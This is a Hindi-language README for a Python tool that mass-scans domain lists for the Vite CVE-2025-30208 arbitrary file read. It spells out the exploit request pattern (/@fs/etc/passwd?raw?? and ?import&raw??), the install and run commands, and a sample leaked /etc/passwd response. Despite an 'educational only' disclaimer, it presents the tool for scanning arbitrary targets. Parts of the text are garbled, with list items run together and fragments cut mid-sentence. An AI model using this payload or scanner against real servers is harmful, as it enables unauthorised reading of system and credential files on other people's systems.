
CVE-2025-30208 ViteVulnScanner
यो, यह एक शानदार मल्टी-थ्रेडेड पायथन स्क्रिप्ट है जो keklick1337 ने बनाई है, Vite में CVE-2025-30208 के लिए संवेदनशील डोमेन खोजने के लिए। मूलतः, यह जाँचता है कि क्या आप @fs एंडपॉइंट के माध्यम से ?raw?? या ?import&raw?? के साथ रैंडम फ़ाइलें पकड़ सकते हैं — जैसे /etc/passwd लीक और अन्य मज़ेदार चीज़ें। इसमें स्मार्ट फ़ॉल्स-पॉज़िटिव फ़िल्टरिंग है ताकि आप बेकार चीज़ों पर समय बर्बाद न करें, साथ ही परिणाम को कैसे आउटपुट करना है, इसे ट्वीक करने के विकल्प भी हैं।
<head> और <body> हों, जब तक कि वह वास्तविक न लगे।sourcemappingurl या export default का पता लगाकर अच्छी चीज़ की पुष्टि करता है।results_good.txt, results_maybe_good.txt, results_bad.txt)।-u के साथ URLs डालें, अगर आपको वह पसंद है।requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt: जाँचने के लिए पथ, प्रति पंक्ति एक (जैसे /etc/passwd)।domains.txt: हिट करने के लिए डोमेन, प्रति पंक्ति एक (जैसे example.com)।इसे इस तरह चलाएँ:
python3 CVE-2025-30208.py <domains_file> [options]
<domains_file>: आपकी डोमेन सूची (फ़ाइल नहीं, स्कैन नहीं, दुह)।-t, --threads: कितने थ्रेड छोड़ने हैं (डिफ़ॉल्ट: 10)।-p, --protocol: http या https पर बल दें, या दोनों के लिए छोड़ दें।-u, --urls: असुरक्षित URLs को आउटपुट में डालें।-o, --output: फ़ाइलों का आधार नाम (डिफ़ॉल्ट: results)।-f, --format: स्प्लिट फ़ाइलों के लिए txt या एक बड़ी फ़ाइल के लिए jsonl (डिफ़ॉल्ट: txt)।python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt: वह चीज़ जो निश्चित रूप से खराब है (इसमें sourcemappingurl या export default है)।results_maybe_good.txt: हो सकता है कि संवेदनशील हो, लेकिन कोई स्मोकिंग गन नहीं।results_bad.txt: साफ, कोई चिंता नहीं।-u जोड़ें और URLs टैब (\t) के साथ जुड़ जाते हैं।-u के साथ results_good.txt का नमूना:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl, results_maybe_good.jsonl, results_bad.jsonl।domain: आपने क्या स्कैन किया।status: VULNERABLE, MAYBE VULNERABLE, या BAD.url (यदि -u): यह कहाँ खराब है।response: सर्वर ने क्या उगला।results_good.jsonl का नमूना:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake)।<head> और <body> के साथ है, तो यह नकारात्मक है — सर्वर बस गधा बन रहा है।path_list.txt में प्रत्येक पथ को @fs/<path>?raw?? और ?import&raw?? के साथ आज़माता है।<head> और <body> हों? उसे छोड़ दें।sourcemappingurl या export default? बूम, GOOD।MAYBE_GOOD।urllib3.disable_warnings()), इसलिए यह सर्टिफिकेट के बारे में नहीं बताता। सावधान रहें।path_list.txt को ट्वीक करें — संवेदनशील फ़ाइलें ही असली चीज़ हैं।सुनो: यह चीज़ केवल शैक्षिक उद्देश्यों के लिए है, दोस्त। अगर तुम कुछ गड़बड़ कर बैठते हो, पकड़े जाते हो, या किसी को गुस्सा दिलाते हो, तो मैं जिम्मेदार नहीं हूँ। इसका उपयोग सीखने के लिए करो, गधा बनने के लिए नहीं। सभी जोखिम तुम पर हैं, नहुई — मैं सिर्फ़ कोड ड्रॉप कर रहा हूँ।
विचार हैं? बग मिला? मुझे issues या pull requests से संपर्क करें। फ़ॉल्स पॉज़िटिव को मारने के और तरीके या शानदार फ़ीचर? चलिए इस बीस्ट को और भी बीमार बनाएँ।
BAD